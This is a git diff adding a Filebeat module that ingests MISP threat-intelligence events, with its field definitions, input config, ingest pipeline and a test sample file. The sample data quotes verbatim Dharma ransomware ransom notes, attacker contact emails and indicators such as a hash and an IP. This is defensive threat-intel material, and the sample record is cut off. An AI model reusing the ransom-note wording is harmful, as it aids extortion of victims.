49xMbgO/TuSu26Qv1P58TiDsCRzh/Awr0VSBNzvVc5ktkCaMBI8mZlMjlclJL0Wi2/ubX66WI3u2ruCleQNDy0Iu9Nj9c13EKUmcOu8JuB8Pztvwd4Hyp+3XDQGeXdu7OdUaJcSEh6wULjoqrnwWu8Pq7pR/fdFhV0ggXPBFIjK11wmeEamxTZ9MhGBI+PrQL13YiqpU2MQKLAN6gshLyEWR5LN5n/x47K6Wma2g2eMLe537iqx9UqDbNLnsheE2mSogSomAVrvPf2QoqTsBnc+paSu4SAijfZkKN9r/DRPRcn3EdjpDqme7O4imJvCXvZVi/HDrTnlGGA3HkRRJC4CwHsZ0Uv8tRl4laKvK7vaRSGTcdgLYY8pcmR3izi/S1hxpXqXfFiqbh2shslQpE2S92Wdfv5HIyqfECkRtst/ybCMILg1VF4lBOd1aVBNMQERVUWewqnmepxGKcw1ty9Z+18QG+qz0eC15tpcP9cIzM1BewXYXuzxDOnDnsPogfvGkJbEH4syWKV6dYU5kpSht86jnXWUXmUEGNkQsi9AEYSeXG5uDGNgg+zNR8fD28+nR8fvWFLawqZaxP+1sHPTe9p69n6Lw+D2lZnyUUNU8yf06g/fl8vbb/5a1O9Va0kmmjc1r76WaBuN+SFWOXZ6JJMk41YuS4Vl59ljI6TYwrEHZhRy++tYK4aU9p3aVXTnLNp4cmy156Bu84DCvkSVCaQgk1TQgrA0Z5ZHoRQDC4nxBrj/M0P6cQl1vrGSULXypuB+vurDBrq3O2N9i/NaCVtaf63d/XxOLhgaoHNxtU5QvcziKe85E5M7U1inb+QdGbtpnT/ItPG5eEPUaGf0s5pAQvlgO7DtBuW+Ysids3IHeZ1lk70LTJEl74VMx2quZFVLlJtWTx3FeGs85QqUdYxR762aRIhWKsLG1eGMmgrYM34u3zS1qe4mdu11pmhmHWXBnXqzNtTl+Q83dBUDVs8tnXu4pUvaVJ595sqAqC0eVp9bVROq0wLg/qTrVMI+JdhcMtgpTm2YrHcuQxv+wdr8nE1WNP+3IGDpYyrDGVdXUs6YrpIpMmFEK0opku8C/Zh1LI1q33xEK8wsmGku78mxAqMa/h+oGqiGx1+U4qitcjFF/SETNzWizoh3MMWD6zC2I+oUXrwG0rZWqgHsFLnsrTI8aqkUpEWbTcsZdIyAxEbp5I1nVZe5Rlla7zZT7Y6OteqvIN1avd6vh7FPMViD1XZCbY+1TAldgtYLZB9a+pXIFXpuaygVULXiQ97OvIaeFe9ejsC63dTH6S/f0ElafeYjqPVPrQKs0ovrUBE1n7wbuDCnhoe21655CQDRO69fYblK48+NtMJWda38E6dRfOdyaYCmtghjTsC278lpRXmIu3eWTaWEizoAwtsgFOT/7cHl+2w1xW6apm7vdmOwrPbqE/vIzu6z9IHwmFHp50FgFVBS+CjoYDuqXTVOucYrS91G2HkIpSeKWYsmKvl9OwOhWojWxt8+9WHkFInnB6dFnLuyyQylISIjFlXEFTqoVsqgbzbYCFTteSR7zayjd7zWZLO56XeLqFlBk2Fedtr5dSmXZRMzKp8DWX+LfJ8IqkCKvhFk9GFifRd+G+f/q/ef2rUWXO2sthB3s3cgbKJjcFI6iAF6LJJ/fay+5KOxlZbiCRq3RtijC2QMLO+6gfkwOfUllqGSw06xgCF0+yrBJAePr3V/+H1Tr/1kihX+WSP9RS6T/EwAA//9cfSez" +} diff --git a/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml b/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml new file mode 100644 index 000000000000..c352ecce303b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml @@ -0,0 +1,165 @@ +- name: misp + type: group + description: > + Fields for MISP Threat Intel + fields: + - name: id + type: keyword + description: > + Attribute ID. + - name: orgc_id + type: keyword + description: > + Organization Community ID of the event. + - name: org_id + type: keyword + description: > + Organization ID of the event. + - name: threat_level_id + type: long + description: > + Threat level from 5 to 1, where 1 is the most critical. + - name: info + type: keyword + description: > + Additional text or information related to the event. + - name: published + type: boolean + description: > + When the event was published. + - name: uuid + type: keyword + description: > + The UUID of the event object. + - name: date + type: date + description: > + The date of when the event object was created. + - name: attribute_count + type: long + description: > + How many attributes are included in a single event object. + - name: timestamp + type: date + description: > + The timestamp of when the event object was created. + - name: distribution + type: keyword + description: > + Distribution type related to MISP. + - name: proposal_email_lock + type: boolean + description: > + Settings configured on MISP for email lock on this event object. + - name: locked + type: boolean + description: > + If the current MISP event object is locked or not. + - name: publish_timestamp + type: date + description: > + At what time the event object was published + - name: sharing_group_id + type: keyword + description: > + The ID of the grouped events or sources of the event. + - name: disable_correlation + type: boolean + description: > + If correlation is disabled on the MISP event object. + - name: extends_uuid + type: keyword + description: > + The UUID of the event object it might extend. + - name: org.id + type: keyword + description: > + The organization ID related to the event object. + - name: org.name + type: keyword + description: > + The organization name related to the event object. + - name: org.uuid + type: keyword + description: > + The UUID of the organization related to the event object. + - name: org.local + type: boolean + description: > + If the event object is local or from a remote source. + - name: orgc.id + type: keyword + description: > + The Organization Community ID in which the event object was reported from. + - name: orgc.name + type: keyword + description: > + The Organization Community name in which the event object was reported from. + - name: orgc.uuid + type: keyword + description: > + The Organization Community UUID in which the event object was reported from. + - name: orgc.local + type: boolean + description: > + If the Organization Community was local or synced from a remote source. + - name: attribute.id + type: keyword + description: > + The ID of the attribute related to the event object. + - name: attribute.type + type: keyword + description: > + The type of the attribute related to the event object. For example email, ipv4, sha1 and such. + - name: attribute.category + type: keyword + description: > + The category of the attribute related to the event object. For example "Network Activity". + - name: attribute.to_ids + type: boolean + description: > + If the attribute should be automatically synced with an IDS. + - name: attribute.uuid + type: keyword + description: > + The UUID of the attribute related to the event. + - name: attribute.event_id + type: keyword + description: > + The local event ID of the attribute related to the event. + - name: attribute.distribution + type: long + description: > + How the attribute has been distributed, represented by integer numbers. + - name: attribute.timestamp + type: date + description: > + The timestamp in which the attribute was attached to the event object. + - name: attribute.comment + type: keyword + description: > + Comments made to the attribute itself. + - name: attribute.sharing_group_id + type: keyword + description: > + The group ID of the sharing group related to the specific attribute. + - name: attribute.deleted + type: boolean + description: > + If the attribute has been removed from the event object. + - name: attribute.disable_correlation + type: boolean + description: > + If correlation has been enabled on the attribute related to the event object. + - name: attribute.object_id + type: keyword + description: > + The ID of the Object in which the attribute is attached. + - name: attribute.object_relation + type: keyword + description: > + The type of relation the attribute has with the event object itself. + - name: attribute.value + type: keyword + description: > + The value of the attribute, depending on the type like "url, sha1, email-src". diff --git a/x-pack/filebeat/module/threatintel/misp/config/config.yml b/x-pack/filebeat/module/threatintel/misp/config/config.yml new file mode 100644 index 000000000000..50f41e23b00e --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/config/config.yml @@ -0,0 +1,72 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: POST +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.body: + limit: 100 + page: 1 + returnFormat: json +{{if .filters}} + {{ range $key, $value := .filters}}{{$key}}: {{$value | tojson}}{{end}} +{{end}} +request.transforms: +- set: + target: header.Authorization + value: {{ .api_token }} +- set: + target: body.timestamp + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "UnixDate" ]]' + +response.split: + target: body.response + split: + target: body.Event.Attribute + keep_parent: true +response.request_body_on_pagination: true +response.pagination: +- set: + target: body.page + value: '[[add .last_response.page 1]]' +cursor: + timestamp: + value: '[[.last_event.Event.timestamp]]' + + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: Event.Attribute.uuid + target: json + - script: + lang: javascript + id: my_filter + source: > + function process(event) { + event.Put("@metadata.op_type", "index"); + } + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml new file mode 100644 index 000000000000..e62a6e407d7d --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml @@ -0,0 +1,293 @@ +description: Pipeline for parsing MISP Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json.Event + target_field: threatintel.misp + ignore_missing: true +- set: + field: threatintel.indicator.provider + value: misp + if: ctx?.threatintel?.misp?.Orgc?.local != 'false' +- set: + field: threatintel.indicator.provider + value: '{{misp.Orgc.name}}' + if: ctx?.threatintel?.misp?.Orgc?.local == 'false' + ignore_empty_value: true + +# Removing fields not needed anymore, either because its copied somewhere else, or is not relevant to this event +- remove: + field: + - threatintel.misp.ShadowAttribute + - message + - threatintel.misp.RelatedEvent + - threatintel.misp.Galaxy + - threatintel.misp.Attribute.Galaxy + - threatintel.misp.Attribute.ShadowAttribute + - threatintel.misp.Object + - threatintel.misp.EventReport + ignore_missing: true +- date: + field: threatintel.misp.Attribute.timestamp + formats: + - UNIX + ignore_failure: true +- rename: + field: threatintel.misp.Attribute + target_field: threatintel.misp.attribute + ignore_missing: true +- rename: + field: threatintel.misp.Orgc + target_field: threatintel.misp.orgc + ignore_missing: true +- rename: + field: threatintel.misp.Org + target_field: threatintel.misp.org + ignore_missing: true +- rename: + field: threatintel.misp.Attribute + target_field: threatintel.misp.attribute + ignore_missing: true +- rename: + field: threatintel.misp.Tag + target_field: threatintel.misp.tag + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- rename: + field: threatintel.misp.attribute.first_seen + target_field: threatintel.indicator.first_seen + ignore_missing: true +- rename: + field: threatintel.misp.attribute.last_seen + target_field: threatintel.indicator.last_seen + ignore_missing: true +- convert: + field: threatintel.misp.analysis + type: long + target_field: threatintel.indicator.scanner_stats + ignore_missing: true +- convert: + field: threatintel.misp.threat_level_id + type: long + ignore_missing: true + +## File/Hash indicator operations +- set: + field: threatintel.indicator.type + value: file + if: "['md5', 'impfuzzy', 'imphash', 'pehash', 'sha1', 'sha224', 'sha256', 'sha3-224', 'sha3-256', 'sha3-384', 'sha3-512', 'sha384', 'sha512', 'sha512/224', 'sha512/256', 'ssdeep', 'tlsh', 'vhash'].contains(ctx.threatintel?.misp?.attribute?.type) || ctx.threatintel?.misp?.attribute?.type.startsWith('filename')" +- rename: + field: threatintel.misp.attribute.value + target_field: "threatintel.indicator.file.hash.{{threatintel.misp.attribute.type}}" + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'file' && !ctx?.threatintel?.misp?.attribute?.type.startsWith('filename')" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.file.name + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'file' && ctx?.threatintel?.misp?.attribute?.type != 'filename'" +- grok: + field: threatintel.misp.attribute.type + patterns: + - "%{DATA}\\|%{DATA:_tmp.hashtype}" + ignore_missing: true + if: ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.file.name}\\|%{DATA:_tmp.hashvalue}" + ignore_missing: true + if: ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') +- set: + field: threatintel.indicator.file.hash.{{_tmp.hashtype}} + value: '{{_tmp.hashvalue}}' + if: "ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') && ctx?._tmp?.hashvalue != null && ctx?._tmp?.hashtype != null" + +## URL/URI indicator operations +- set: + field: threatintel.indicator.type + value: url + if: "ctx?.threatintel?.indicator?.type == null && ['url', 'link', 'uri'].contains(ctx?.threatintel?.misp?.attribute?.type)" +- uri_parts: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.misp?.attribute?.type != 'uri' +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.url.full + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null && ctx?.threatintel?.misp?.attribute?.type != 'uri'" + +## Regkey indicator operations +- set: + field: threatintel.indicator.type + value: windows-registry-key + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type.startsWith('regkey')" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.registry.key + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'windows-registry-key' && ctx?.threatintel?.misp?.attribute?.type == 'regkey'" +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.registry.key}\\|%{DATA:threatintel.indicator.registry.value}" + ignore_missing: true + if: "ctx?.threatintel?.misp?.attribute?.type == 'regkey|value'" + +## AS indicator operations +- set: + field: threatintel.indicator.type + value: autonomous-system + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type == 'AS'" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.as + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'autonomous-system' + +## Domain/IP/Port indicator operations +- append: + field: threatintel.indicator.type + value: domain-name + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type.startsWith('domain')" +- append: + field: threatintel.indicator.type + value: ipv4-addr + if: "ctx?.threatintel?.indicator?.type == null && ['domain|ip', 'ip-src', 'ip-src|port', 'ip-dst', 'ip-dst|port'].contains(ctx?.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.domain + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'domain-name' && ctx?.threatintel?.misp?.attribute?.type != 'domain|ip'" +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.domain}\\|%{IP:threatintel.indicator.ip}" + ignore_missing: true + if: ctx.threatintel?.misp?.attribute?.type == 'domain|ip' +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{IP:threatintel.indicator.ip}\\|%{NUMBER:threatintel.indicator.port}" + ignore_missing: true + if: "['ip-src|port', 'ip-dst|port'].contains(ctx.threatintel?.misp?.attribute?.type)" + +## Email indicator operations +# Currently this ignores email-message, except setting the type it will leave the rest of the fields under misp. +- set: + field: threatintel.indicator.type + value: email-addr + if: "ctx?.threatintel?.indicator?.type == null && ['email-dst', 'email-src'].contains(ctx.threatintel?.misp?.attribute?.type)" +- set: + field: threatintel.indicator.type + value: email-message + if: "ctx?.threatintel?.indicator?.type == null && ctx.threatintel?.misp?.attribute?.type.startsWith('email') && !['email-dst', 'email-src'].contains(ctx.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.email.address + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'email-addr' + +## MAC Address indicator operations +- set: + field: threatintel.indicator.type + value: mac-addr + if: "ctx?.threatintel?.indicator?.type == null && ['mac-address', 'mac-eui-64'].contains(ctx.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.mac + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'mac-addr' + +################### +# Tags ECS fields # +################### +# Stripping special characters from tags +- script: + lang: painless + if: ctx?.threatintel?.misp?.tag != null + source: | + def tags = ctx.threatintel.misp.tag.stream() + .map(t -> t.name.replace('\\', '').replace('"', '')) + .collect(Collectors.toList()); + def tlpTags = tags.stream() + .filter(t -> t.startsWith('tlp:')) + .map(t -> t.replace('tlp:', '')) + .collect(Collectors.toList()); + + ctx.tags = tags; + ctx.threatintel.indicator = ['marking' : [ 'tlp': tlpTags ]]; + +# Setting indicator type to unknown if it does not match anything +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null + +###################### +# Cleanup processors # +###################### +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +# Removing fields not needed anymore, either because its copied somewhere else, or is not relevant to this event +- remove: + field: + - threatintel.misp.Attribute.timestamp + - threatintel.misp.timestamp + - threatintel.misp.tag + - threatintel.misp.org + - threatintel.misp.analysis + - _tmp + ignore_missing: true + +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/misp/manifest.yml b/x-pack/filebeat/module/threatintel/misp/manifest.yml new file mode 100644 index 000000000000..a39c1fe44963 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/manifest.yml @@ -0,0 +1,20 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: first_interval + default: 24h + - name: api_token + - name: ssl + - name: filters + - name: url + default: "https://localhost/events/restSearch" + - name: tags + default: [threatintel-misp, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log new file mode 100644 index 000000000000..9cbd51a844e8 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log @@ -0,0 +1,15 @@ +{"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"Payload delivery","comment":"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"5","first_seen":null,"id":"351","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1503930272","to_ids":true,"type":"md5","uuid":"59a427a0-f6f8-4178-9e7d-dfd702de0b81","value":"f2679bdabe46e10edc6352fff3c829bc"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|178.128.103.74","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES 